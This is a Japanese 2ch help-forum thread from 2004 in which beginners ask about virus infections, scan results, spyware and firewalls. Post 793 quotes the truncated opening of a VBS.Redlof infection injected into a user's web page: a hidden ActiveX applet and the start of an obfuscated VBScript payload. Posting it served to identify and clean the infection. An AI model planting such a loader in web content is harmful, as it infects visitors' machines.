The page cannot be displayed.
There is a problem with the page you are trying to reach and it cannot be displayed.

--------------------------------------------------------------------------------

Please try the following:

Click the Refresh button, or try again later.

Open the www.pandasoftware.com home page, and then look for links to the information you want.
If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the www.pandasoftware.com home page.
HTTP 502.1 - Unable to forward to host server
Internet Information Services

--------------------------------------------------------------------------------

って別窓で出るんですけど・・混みあってるってことでしょうか?

786 :ひよこ名無しさん:04/08/04 00:48 ID:???
>>785
HTTP StatusCode
http://e-words.jp/p/r-httpstatus.html

787 :ひよこ名無しさん:04/08/04 00:50 ID:IiA4LnlL
>>786
サーバーエラー?
で、具体的にどうすれば・・

788 :ひよこ名無しさん:04/08/04 00:57 ID:IiA4LnlL
すみません。何度かやったら繋がりました。

789 :782:04/08/04 00:59 ID:4ctuWkx7
>>784
784さんの記事を見たので途中(理解不能なタグなど)はカットしたのを
用意したのですがこれでもノートン誤認識しますかね?
何かあったら恐いので大丈夫と確認が出来たら改めてコピペしたいと思います。

790 :ひよこ名無しさん:04/08/04 01:01 ID:???
>>789
>>783さんの言うようにやればいいじゃない

791 :ひよこ名無しさん:04/08/04 01:02 ID:???
>>789
やってみないとわからんし。


792 :ひよこ名無しさん:04/08/04 01:03 ID:???
>>789
さらに、< と >を全角の<>に置換すれば、かなり安心。

793 :789:04/08/04 01:04 ID:4ctuWkx7
>>783

<HTML>
<BODY onload="vbscript:KJ_start()">
<script language=vbscript>
document.write "
<div style='position:absolute; left:0px; top:0px;
width:0px; height:0px; z-index:28; visibility: hidden'>
<"&"APPLET NAME=KJ"&"_guest HEIGHT=0 WIDTH=0
code=com.ms."&"activeX.Active"&"XComponent></APPLET></div>"
</script>
<script language=vbscript>
ExeString = "=fhBkRa^o`%AqheMbsm%S]lMbsm%A``kb`Lbdi%:mke^
…最初は普通にタグが表示されているのですが、この後理解不明な
タグが永遠と5〜6行に渡って記述されているんです。
借りているホストはロリポップの有料で広告なども無いはずなのですが…
ウィルスでしたら名前だけでも教えていただけたら
最低限の対処が出来るかもしれませんのでよろしくお願いします!



794 :793:04/08/04 01:07 ID:4ctuWkx7
確かに大文字の「i」に変換したつもりなのですが…これは小文字!?
スミマセン!大丈夫でしょうか??

795 :ひよこ名無しさん:04/08/04 01:09 ID:???
>>793
VBS.Redlof に感染してると思う。
これを検出できないってどんなワクチンソフトかな。
そのサーバ上のほかのページも感染してれば、ホストが感染してるけど、
自分のページだけなら、自分のPCが感染してることになる。

796 :793:04/08/04 01:12 ID:4ctuWkx7
>>795
ありがとうございます!
たぶん自分のPCが感染していると思われるので
すぐにでも対処したいと思います!


797 :ひよこ名無しさん:04/08/04 01:46 ID:???
始めまして。先日ウイルスに感染しデータが全て消えました。
それで再インスコを試みたんですがブート?の画面で
NTLDR IS MISSING
という文章が出て先に進めなくなりました。
この現象もウイルスと関係しているんでしょうか?


798 :ひよこ名無しさん:04/08/04 02:10 ID:???
ブートファイルが壊れてるとNTLDR Is Missingが出る

799 :wiki:04/08/04 02:12 ID:???
或いは、BIOSが古いときもNTLDR Is Missingが出る

800 :ひよこ名無しさん:04/08/04 02:33 ID:???
ぐはっ
BackDoor...

801 :ひよこ名無しさん:04/08/04 02:34 ID:???
御愁傷様。

802 :ひよこ名無しさん:04/08/04 02:57 ID:3McPRz9I
>>776です。
かなり昔に同様の質問をエロサイト・・・スレで質問したのですが
「ウィルスです」と言われてそれっきり・・・(´д`;
テンプレはほとんど全部やりました
CWshredderもHijack thisも・・・でも治らないのです。
対処法ご存知の方を気長に待ちます…

803 :ひよこ名無しさん:04/08/04 02:59 ID:???
>>802
▼━ 質問のしかた ━━━━━━━━━━━━━━
* ウイルスです。窓の手使え。修復コンソール。等の短い嘘回答や 愛新覚羅 を信用しないように

804 :797:04/08/04 03:20 ID:???
>>798 >>799
ありがとうございます。
解決方法としてはHDDのデータを全て消去し
新しくインストールすればOKですか?


805 :ひよこ名無しさん:04/08/04 07:26 ID:IiA4LnlL
・トレンドマイクロ/オンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
で一回目検索。結果↓
ADW_SAFESEARCH.A
TROJ_CRYPTER.A
TROJ_DYFUCA.B
TROJ_DLUCA.F
TROJ_179.A
TROJ_DYFUCA.BX
TROJ_DYFUCA.M
がヒット。
・シマンテック セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
で一回目検索。結果↓
c:\WINDOWS\SYSTEM\win32info.exe は Downloader.Dluca に感染しています。
c:\WINDOWS\SYSTEM\win32info-uninstall.exe は Download.Trojan に感染しています。
c:\Program Files\gikoNavi\Log\2ch\pcqa\1046764388.dat は
VBS.LoveLetter.Var に感染しています。
c:\Program Files\gikoNavi\Log\2ch\liventv\1084192429.dat は
VBS.LoveLetter.Var に感染しています。
c:\Program Files\gikoNavi\Log\2ch\livecx\1090475010.dat は
VBS.LoveLetter.Var に感染しています。
c:\Program Files\gikoNavi\Log\2ch\livecx\1090764710.dat は
VBS.Internal に感染しています。
で、・Panda/無償オンラインスキャン
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
で検索・駆除したところ↓のような結果に。
インシデント 状態 ロケーション
Virus:Trj/SysCenter.A 駆除 オペレーティングシステム
Virus:Trj/Small.R 駆除 C:\WINDOWS\SYSTEM\win32info-uninstall.exe
Virus:Trj/SysCenter.A 駆除 C:\WINDOWS\TEMP\wnk51f5.EXE


806 :ひよこ名無しさん:04/08/04 07:28 ID:IiA4LnlL
これで削除できたのかな?と思って再度検索かけたところ
トレンドマイクロ/オンラインスキャンは前出と結果は同じ。
シマンテック セキュリティチェックだと
ADW_SAFESEARCH.Aは消えたものの他はそのまま。
さらにADW_SAFESEARCH.A というのが増えました。

現状を把握できないのですが、ウィルスは削除できていないのでしょうか?
OSはMeです。

807 :ひよこ名無しさん:04/08/04 07:31 ID:???
>>806
駆除できてない。
オンラインスキャンは基本的にウィルスをスキャンするだけで、駆除まではやってくれない。


808 :806:04/08/04 07:34 ID:IiA4LnlL
>>807
えと、じゃあ
Virus:Trj/SysCenter.A 駆除 オペレーティングシステム
Virus:Trj/Small.R 駆除 C:\WINDOWS\SYSTEM\win32info-uninstall.exe
Virus:Trj/SysCenter.A 駆除 C:\WINDOWS\TEMP\wnk51f5.EXE
は意味無いってことでしょうか?
検出されたトロイ他を地道に関連サイトを見て消していくしか方法はないのでしょうか?

809 :ひよこ名無しさん:04/08/04 07:39 ID:???
>>808
Pandaで削除されたものは意味は無くはない。
ただ、このオンラインスキャンで発見できなかったウィルスは当然そのまま。

シマンテックやトレンドマイクロのオンラインスキャンでスキャンできた
ものは検出されたウィルスを地道に手動で削除するか、ウィルス対策ソフトを
購入してインストールし削除。

どれも完全というのは無い。最近のウィルスは対策ソフトの挙動をおかしくするものもあるしね。

810 :ひよこ名無しさん:04/08/04 08:48 ID:???
>>808
最近のトロイは、セーフモード起動時でさえ、
実行されてしまうキーに本体ファイルを登録するので、ソフトを持っていても削除出来なくなって来ている。
認識が甘い。手動削除だ。

811 :728:04/08/04 08:57 ID:7vyqLdtS
spybotとAd-Awereを入れたら、すごい数のスパイウェアが出ました〜。

多分これで安心してはいけないんだろうけど、快適に繋がるようになったし、
PCの反応もよくなりました。

どうもありがとうございました!!!!(><

812 :808:04/08/04 12:04 ID:IiA4LnlL
>>809-810
とても全て手動で駆除する知識も技術もないのですが
対策ソフトを購入すれば一発で自動的に駆除してくれるツールとかはあるのでしょうか?
(現在判明しているトロイ系の物を削除できればいいんですが)
また、駆除するツールと以後感染を防ぐ為のツールは別々なんでしょうか?

813 :ひよこ名無しさん:04/08/04 12:32 ID:???
>>812
無いよ、そんなもの
対策ソフトと駆除ツールは違うし

対策ソフト入れたといしても、あんたの場合トロイにやられてレジストリ改変されてるから、
手動で修復しないと直らないね(ウィルスとトロイは別物)
それが出来ないならOS再インストール

対策ソフト入れてないのが悪い

今後のためにここでも読んでみたら?

ウィルス対策スクール
http://www.ipa.go.jp/security/y2k/virus/cdrom/index.html

814 :ひよこ名無しさん:04/08/04 12:37 ID:IiA4LnlL
>>813
OSの再インストールとはどうしたらできるのでしょうか?
再インストールするとトロイは無効化されるのでしょうか?
また再インストールするとどんな影響がありますか?

どうしようもない質問ばかりですみませんが・・

815 :ひよこ名無しさん:04/08/04 12:37 ID:???
>>814=ねた

816 :ひよこ名無しさん:04/08/04 12:39 ID:???
>>814
誰、お前?>>1読んでルール違反を解消しろ。

817 :805:04/08/04 12:44 ID:IiA4LnlL
>>816

818 :805:04/08/04 12:48 ID:IiA4LnlL
>>813
OSの再インストールとはどうしたらできるのでしょうか?
再インストールするとトロイは無効化されるのでしょうか?
また再インストールするとどんな影響がありますか?

どうしようもない質問ばかりですみませんが・・


819 :ひよこ名無しさん:04/08/04 12:51 ID:???
>>818
本当にどうしようも無いな。

>OSの再インストールとはどうしたらできるのでしょうか?
取説に書いてある。

>再インストールするとトロイは無効化されるのでしょうか?
なる。まぁ、例外は無くは無いが。

>また再インストールするとどんな影響がありますか?
ある種のデータが消える。大事なデータはバックアップを取る。
というか、スパイウェア、ウィルスに感染する以前からバックアップは必要。


820 :ひよこ名無しさん:04/08/04 12:51 ID:???
>>805
http://www.google.com
検索する語句
「ME 再インストール」

821 :ひよこ名無しさん:04/08/04 17:46 ID:LsvCDD7B
2、3日前ぐらいから以下の内容のダイアログが
ずっと出つづけてて止まりません…

「エラーが発生したため、system.exeを終了します。プログラムをもう一度
開始する必要があります。
エラー ログを作成しています。」


オンラインスキャンやノートン(アップデート済)でもウイルス検索したのですが
それらしいウイルスが検出されず、未だにダイアログが止まりません…
もしかしてこれってウイルスじゃないのでしょうか・・?
OSはwin2000 SP4です。

822 :ひよこ名無しさん:04/08/04 17:49 ID:???
>>821
スパイウェアの可能性が高いかもな

823 :ひよこ名無しさん:04/08/04 17:49 ID:omNMQPwS
exeファイルって、削除してはいけないんですか?
それと、おすすめのブラウザとかありましたら教えてください。
よろしくお願いします。

824 :ひよこ名無しさん:04/08/04 17:51 ID:???
>>823
上、ものによる。
下、適当にタブブラウザ入れろ。スパイウェアが怖いなら非IEコンポーネントのものな。

825 :ひよこ名無しさん:04/08/04 17:52 ID:???
誤爆しました・・・
すいません。

826 :823:04/08/04 17:53 ID:???
825=823です。
>>824さん、答えてくださってありがとうございました。

827 :ひよこ名無しさん:04/08/04 17:53 ID:???
>>825
誰、お前?

828 :821:04/08/04 18:09 ID:???
>>822
今spybotってやつ使ってみましたけど直りません…


829 :821:04/08/04 18:10 ID:LsvCDD7B
さげてしまった…すみません

830 :ひよこ名無しさん:04/08/04 18:11 ID:???
>>828
だから何?
Spybotで検出されたのかも書いてねえし、
実際にそれが削除できたのかも書いてねえし。
何が聞きたいんだ?

831 :ひよこ名無しさん:04/08/04 18:17 ID:???
>>821
レジストリ内をsystem.exeで検索して削除する。
本体ファイルのありかもそれでわかるだろうから、削除する。
デフォルトでは、どっちにしてもないはずのファイルだ。

832 :821:04/08/04 18:21 ID:LsvCDD7B
検出されたものは削除しましたが直りませんでした
対処法をきいてるんですが…

833 :ひよこ名無しさん:04/08/04 18:25 ID:???
>>832
だから、検出されたものを書かないと。
で、再起動して実際に削除できてるかもう一度Spybotを。

834 :ひよこ名無しさん:04/08/04 18:33 ID:???
>>821
ウィルスじゃねえだろ
まともに動かない、不良プログラムを仕込まれただけだろうよ

835 :821:04/08/04 18:46 ID:LsvCDD7B
>>831
レジストリ内ってCドライブでいいんでしょうか?
Cドライブ検索しましたがsystem.exe見つかりませんでした

>>833
DSO Exploit: Data source object exploit (レジストリ変更, fixed)
HKEY_USERS\S-1-5-21-682003330-162531612-2146954855-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (レジストリ変更, fixed)
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3


--- Spybot - Search && Destroy version: 1.3 ---
2004-07-09 Includes\Cookies.sbi
2004-07-28 Includes\Dialer.sbi
2004-07-27 Includes\Hijackers.sbi
2004-07-27 Includes\Keyloggers.sbi
2004-05-12 Includes\LSP.sbi
2004-07-27 Includes\Malware.sbi
2004-07-09 Includes\Revision.sbi
2004-07-02 Includes\Security.sbi
2004-07-27 Includes\Spybots.sbi
2004-07-28 Includes\Tracks.uti
2004-07-27 Includes\Trojans.sbi

これ、再起動してもう一度検索してみたらまた出てきました・・・
削除されてないっぽいですか…?
でもリカバリーのところにちゃんとログみたいなのありました

836 :ひよこ名無しさん:04/08/04 18:48 ID:???
>>835
DSO ExploitはSpybotでは何度も検出されることになる。
その辺はテンプレリンク先を具に読めば解る事なんだが。

で、その他の問題は?

837 :ひよこ名無しさん:04/08/04 18:49 ID:???
>>835
DSO Exploitの検出はspybotのバグ
検索してみ

838 :ひよこ名無しさん:04/08/04 18:49 ID:???
>>835
http://higaitaisaku.web.infoseek.co.jp/regedit.html

839 :821:04/08/04 18:54 ID:???
>>836
みなさんありがとうございました!
今度からリンク先ちゃんと読んでから質問します。
ご迷惑おかけしました… m(_ _)m

840 :ひよこ名無しさん:04/08/04 19:04 ID:FKA0RLcA
・シマンテック セキュリティチェックでセキュリティチェックしたところ
対ハッカー露出度チェックで「要注意!」と出て
「推奨・ファイヤーウォールをインストールしてください」と出たんですが
初心者なもんでよくわからんです。
ファイヤーウォールのソフトを購入してインストールしろ!って事でしょうか。
現状で何か設定をいじってどうにかしろって事なのでしょうか?


841 :ひよこ名無しさん:04/08/04 19:10 ID:???
>>840
フリーでもある。市販品の方が取り扱いは楽だと思うけど

【PFW】フリーファイアウォールベスト2
http://pc5.2ch.net/test/read.cgi/sec/1074431848/

842 :840:04/08/04 19:16 ID:FKA0RLcA
>>841
どうもです。リンク先熟読してきます。

843 :840:04/08/04 19:57 ID:FKA0RLcA
ZoneAlarm pro(15日間お試しの方)を落として
ファイヤーウォール設定を「高」にしてみたんですけど
やっぱり>>840のチェックをしたら「ファイヤーウォールを・・」と出てしまいます。
んー・・どうしたらいいのやら・・・

844 :ひよこ名無しさん:04/08/04 20:22 ID:???
ルータ買え

845 :840:04/08/04 20:40 ID:FKA0RLcA
ルータとは?
ネットワーク上を流れるデータを他のネットワークに中継する機器。
OSI参照モデルでいうネットワーク層(第3層)やトランスポート層(第4層)の一部のプロトコルを解析して転送を行なう。
ネットワーク層のアドレスを見て、どの経路を通して転送すべきかを判断する経路選択機能を持つ。
また、自分の対応しているプロトコル以外のデータはすべて破棄する。複数のプロトコルに対応したルータをマルチプロトコルルータと呼ぶ。

えーと・・量販店で「ルータのソフトください」って言えばいいのかしら?



846 :ひよこ名無しさん:04/08/04 20:43 ID:???
>>845
たぶん店員にハァ?バカこいつ?という顔をされます

847 :ひよこ名無しさん:04/08/04 20:44 ID:???
>>845
https://grc.com/x/ne.dll?bh0bkyd2
具体的に何番のポートが開いているのか言え

848 :840:04/08/04 20:55 ID:FKA0RLcA
>>847
リンク先が英文なんで読めないです。
どうしたら何番のポートが開いているかとかわかるのでしょうか?

849 :ひよこ名無しさん:04/08/04 21:01 ID:???
>>848
Proceedをクリックしたら、次のページのAll Service Portsをクリックする。

850 :840:04/08/04 21:07 ID:FKA0RLcA
えーと、なんやら青いブロックがズラーと出てきて左に0〜1024、右に31〜1055って書いてあります。
1個だけ赤いのがあったんでクリックしたら「Port 80」と表示されました。


851 :ひよこ名無しさん:04/08/04 21:25 ID:???
>>850
全然ファイアーウォールが働いていませんなあ。
全部緑にならないとダメなんだよ。
ルーター機能付きのモデム使っているの?
それじゃなきゃ、設定をやり直し。

852 :ひよこ名無しさん:04/08/04 21:28 ID:???
>>850
http://www.forest.impress.co.jp/lib/inet/security/firewall/outpost.html

853 :ひよこ名無しさん:04/08/04 21:29 ID:???
>>843
ZoneAlarmは、Proじゃなくてフリーのやつ使えよ(;´Д`)


854 :840:04/08/04 21:50 ID:FKA0RLcA
>>851
モデムはプロバイダからレンタルしてるやつなんで性能はよくわからんです。

>>852
試してみます。


>>853
間違えてプロの方落としちゃったんですが
変更はできないんでしょうか?

855 :ひよこ名無しさん:04/08/04 21:54 ID:???
>>854
たぶん無理
Free版をインストールしようとしても、ZoneAlarmProを入れさせたがるから
それでも拒否して、はじめてFree版になる
Free版で十分に全ポートは塞げる、理解できなければ日本語版落とせ


856 :ひよこ名無しさん:04/08/04 22:02 ID:FKA0RLcA
>>855
でも「お試し版」なので有料ではないんですよね?

あと>>852のも英文だったんだけど適当に落としたんですが、
そしたら再起動した後に数秒だけ「警告!」とかなんか文章が出たんだけど
すぐ消えちゃってその後、ツールが立ち上がったんですが
ネットに接続する度、

・このアプリケーションに関する活動を全て許可
・このアプリケーションに関する活動を全て遮断
・プリセットからツール作成
>今回は許可 >今回は遮断 >OK

って出るんですけど、これって任意の使用するサイトだけ「このアプリケーションに関する活動を全て許可」に
すれば余計なとこから攻撃を受けないって事なんでしょーか?

857 :ひよこ名無しさん:04/08/04 22:11 ID:???
>>856
2、3日掛かってもいいから、一通りファイアーウォールの機能を理解してから、ネットに繋いだ方が安全だと思うぞ。
それとも、親切な人に一つずつ、説明してもらうか?

858 :840:04/08/04 22:13 ID:FKA0RLcA
んーじゃこの中途半端にツールを落として中途半端に設定した状態で
ネット接続を数日諦めて、ファイヤーウォール関係の本を読めと・・そういうことでしょうか?

859 :ひよこ名無しさん:04/08/04 22:22 ID:???
>>858
Yes。さいなら

860 :ひよこ名無しさん:04/08/04 22:25 ID:???
>>858
じゃあ、一通り基本を説明するぞ。
そのどうしますか?と聞いて来るのは、ネットに発信しようとしているアプリケーション。
ほとんどは、自分で発信した情報のリターンパケットが必要なだけなので、
サーバーとしてのアクセス許可は必要ない。
外部に対してだけ許可すればOK。

サーバーとして機能させたい場合
この時には、使用するポートを開けた上で、外部からの通信要求に答えるために、
そのアプリケーションに全てのアクセスを許可するように設定する。

861 :ひよこ名無しさん:04/08/04 22:57 ID:FO+FsQrm
プログラムにrough riders_jpと見覚えもなくかなり怪しいのですが、これはウィルス
なのでしょうか?よいアドバイスをお待ちしております。

862 :ひよこ名無しさん:04/08/04 23:04 ID:???
>>861
ウィルスですか?って聞く前にスキャンくらいしたらどうよ

ウィルススキャン後こっち行ってテンプレ実行
たぶんスパイウェア

エロサイト見たら…助けてください!Part36
http://pc6.2ch.net/test/read.cgi/pcqa/1091521211/


863 :ひよこ名無しさん:04/08/04 23:11 ID:qvaHAair
すみませんが、教えてください。

今トレンドマイクロオンラインウイルススキャンをしてみたら、
VBS REDLOF Aというウイルスが2435個も見つかってしまいました。
本当に何も分からず、その数に呆然としています。
対処法等、教えてください。お願いします…

864 :ひよこ名無しさん:04/08/04 23:12 ID:???
>>863
リカバリー

865 :ひよこ名無しさん:04/08/04 23:12 ID:???
>>863
大杉。同じくリカバリー。

866 :ひよこ名無しさん:04/08/04 23:13 ID:???
>>863
見つかった場所は?

867 :ひよこ名無しさん:04/08/04 23:13 ID:???
>>853
ひゃーーーーーー。
2435個。凄いね。抜かれちゃった。

僕は6個が最高だよ?

868 :863:04/08/04 23:14 ID:qvaHAair
やっぱり、それしかありませんか…。なんかすごい悲しいです。
多すぎますよね…。
駆除とかってやっぱり無理でしょうか。

あとこのウイルスって、何をするんでしょうか。

869 :ひよこ名無しさん:04/08/04 23:15 ID:???
おいおい。2434個だよ?治らん。見かけ上はまともでボロボロ。
2400個までは大丈夫なんだけどね。

870 :ひよこ名無しさん:04/08/04 23:16 ID:???
>>868
なんというか、迷惑
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A&VSect=T

871 :863:04/08/04 23:18 ID:qvaHAair
>>866
場所というのは、ウイルススキャンでいう「ファイル」のことでしょうか?
それならC:\RECYCLEDやC:\WINDOWSの
OPTIなんとかとかSYSTEMなんとかとか…もう色々です。

872 :ひよこ名無しさん:04/08/04 23:19 ID:???
>>871
アウト!
早々に回線切ってリカバリしてね、迷惑だから

873 :863:04/08/04 23:20 ID:qvaHAair
>>870
最悪ですね…。
メール等はまったく利用してないので、
それだけは救いだったかもしれません。

874 :ひよこ名無しさん:04/08/04 23:21 ID:???
>>873
REDLOFはメールでは拡大感染しない

875 :863:04/08/04 23:21 ID:qvaHAair
>>874
そうでしたか、すいません…
リカバリ、頑張ります…

876 :ひよこ名無しさん:04/08/04 23:28 ID:???
>>875
セキュリティパッチも当てない迷惑なやつ

877 :ひよこ名無しさん:04/08/04 23:55 ID:???
>>875
よく2434個も入ってるのに気づかなかったな・・・
リカバリしたら、ちゃんとアンチウィルスソフト、ファイヤーウォール、
アンチスパイソフトは入れておけよ。

878 :ひよこ名無しさん:04/08/04 23:56 ID:???
>>875
WindowsUpdateもしろよ

879 :863:04/08/05 00:01 ID:cxgcQ7gp
>>876
ごめんなさい。何も分からないからといって、さすがに無防備すぎでした。

>>877
何故気付かなかったのか、本当に自分でも謎です。
特別おかしいと思えるようなこともありませんでしたし…
ですが、一応ウイルスバスター2002は入ってました。

>>878
多分、手に入れて3年以上もせずに放置したせいだと思います。
この間はじめてしたのですが遅すぎました。


ところで、リカバリに向けて、今データのバックアップを取っているのですが、
これって感染したウイルスをバックアップ取ってしまってたりはしませんか?

880 :ひよこ名無しさん:04/08/05 00:04 ID:fmatHTHm
C:\WINDOWS\dlm.html は Downloader.Trojan に感染しています。
C:\WINDOWS\doru32.dll は PWS.Hooker.Trojan に感染しています。
C:\WINDOWS\mstaskss.exe は Backdoor.Tofger に感染しています。
C:\WINDOWS\system32\appsys.exe は Download.Trojan に感染しています。
C:\WINDOWS\Downloaded Program Files\load.exe は Trojan Horse に感染しています。
C:\Program Files\gikoNavi\Log\2ch\wcomic\1059576479.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\qa\1057915942.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\qa\1062150855.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\qa\1063056072.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\qa\1075573084.dat は Macro.src に感染しています。


881 :ひよこ名無しさん:04/08/05 00:05 ID:fmatHTHm
C:\Program Files\gikoNavi\Log\2ch\newsplus\1049261332.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1058565121.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1059134139.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1061344904.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1061438504.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1061527856.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1061630237.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livetbs\1061388960.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livetbs\1072779302.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liventv\1059739702.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liventv\1070110424.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liventv\1082524186.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liventv\1082823919.dat は VBS.LoveLetter.CI に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liventv\1088771700.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livenhk\1062066558.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1059120763.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1059577236.dat は VBS.LoveLetter.A に感染しています。

882 :ひよこ名無しさん:04/08/05 00:06 ID:fmatHTHm
C:\Program Files\gikoNavi\Log\2ch\livecx\1059604860.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1061381387.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1061382600.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1061383798.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1062131174.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1062147989.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1063799560.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1063801436.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1065256779.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1065261277.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1069102622.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1071057570.dat は VBS.Network.E に感染しています。


883 :ひよこ名無しさん:04/08/05 00:07 ID:fmatHTHm
C:\Program Files\gikoNavi\Log\2ch\livecx\1072429939.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1072452499.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1083662251.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liveanb\1062415814.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\jfoods\1055404179.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\jfoods\1061608841.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\gline\subject.txt は Unix.Penguin に感染しています。
C:\Program Files\gikoNavi\Log\2ch\ascii\1059267406.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\ascii\1074563937.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\aasaloon\1047556388.dat は Macro.src に感染しています。


・・・とか出てしまったんですが、緊急性を要する物ってありますでしょうか?
何かやたら「ギコナビ〜」ってのが多い気がするんですがどうしてなんでしょう?


884 :ひよこ名無しさん:04/08/05 00:10 ID:???
>>883
まずは、ルール違反。>>1読め。

885 :ひよこ名無しさん:04/08/05 00:10 ID:???
>>880-883
ノートンがvbsウィルスのソースに誤反応2
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/

886 :ひよこ名無しさん:04/08/05 00:12 ID:???
>>883
んで、エロサイトいったせいで変な病気もらってる

887 :ひよこ名無しさん:04/08/05 00:14 ID:???
>>879
ttp://www.trendmicro.com/jp/support/old-versions/old-versions/products/vb.htm
ウィルスバスター2002は、既にサポート期間終わってるぞ。
最新の定義にできるのかどうか知らないが、もしできないならフリーのアンチウィルスソフトでも入れとけ。
>>880-883のうち、ギコナビ関係のは無害。その他の感染ファイルはダメなやつ。
2400個のうち大半がギコナビなら、駆除可能かもよ?

888 :883:04/08/05 00:16 ID:fmatHTHm
あ、自分2400個の人とは別人です。
ありがとうございました。ギコナビ以外のを手動でなんとかしてみます。

889 :863:04/08/05 00:18 ID:cxgcQ7gp
>>887
そうですか…とりあえずリカバリして、
その後新しいバスター買って入れ直そうと思います。
何から何まですみませんでした。

890 :ひよこ名無しさん:04/08/05 00:19 ID:???
ウィルスバスター2004のお試し版を使っていたのですが試用期限が7月26日で切れてしまいました。
ところがあいかわらずプロダクトファイルのアップデートは定期的にされています。
これはまだ使えるということなのでしょうか?それとも表示が出るだけで
バージョンアップはされてないのでしょうか?

891 :ひよこ名無しさん:04/08/05 00:39 ID:???
>>889
注意しておくのは、「常駐保護機能」を必ずONにしておく事。
たとえサポート期間が終わっているウィルスバスター2002でも、
それさえONにしていればそんな数にはならなかったはずだ。
ソフト持ってるなら、アップデートしてみて、ダメ元で駆除してみればいいのに。

892 :ひよこ名無しさん:04/08/05 02:22 ID:Juu9kNwM
ペイントを開こうとしても
「このプログラムは不正な処理を〜」と出てきて開けません

詳細を開くと

MSPAINT のページ違反です。
モジュール : MFC42.DLL、アドレス : 015f:6ab1f9eb
Registers:
EAX=00000000 CS=015f EIP=6ab1f9eb EFLGS=00010202
EBX=005861d4 SS=0167 ESP=0056f91c EBP=0056f940
ECX=00007fff DS=0167 ESI=00691530 FS=4b07
EDX=00019ee4 ES=0167 EDI=0056f950 GS=0000
Bytes at CS:EIP:
89 48 58 8b 45 fc 3b 47 0c 7c cf 33 f6 39 77 0c
Stack dump:

と出てきます。どうでしょう?ウィルスでしょうか?

893 :ひよこ名無しさん:04/08/05 02:25 ID:???
>>892
聞く前にウイルス検査しろ。

894 :ひよこ名無しさん:04/08/05 03:36 ID:RNID5Yq/
質問です。
晒されたURLで、拡張子はJPGだけど実はウイルスってやつですが、
「DLソフトで落とす→Susieプラグイン対応ビューアで見る」
ってやれば感染する心配は無いんでしょうか?

895 :ひよこ名無しさん:04/08/05 03:40 ID:???
>>894
感染しない。

ついでに、IEとかを異常終了させるブラクラGIFもSusieなら大丈夫。

896 :894:04/08/05 03:45 ID:RNID5Yq/
>>895
THX!
では頑張ってきます。

897 :ひよこ名無しさん:04/08/05 04:01 ID:???
ノートンによるチェックの後、Troyan.ByteVerifyというウィルスが発見されました。
修復はできなかったようで、そのファイルは今検疫のところにあります。

シマンテックのHPに書いてある駆除方法を試してみましたが、うまくいきませんでした。
検疫の画面から修復しようとしてもダメです。

ファイル名はCounter.classとVerifierBug.classです。
このまま削除してしまってもいいのでしょうか。

898 :ひよこ名無しさん:04/08/05 04:12 ID:???
>>897
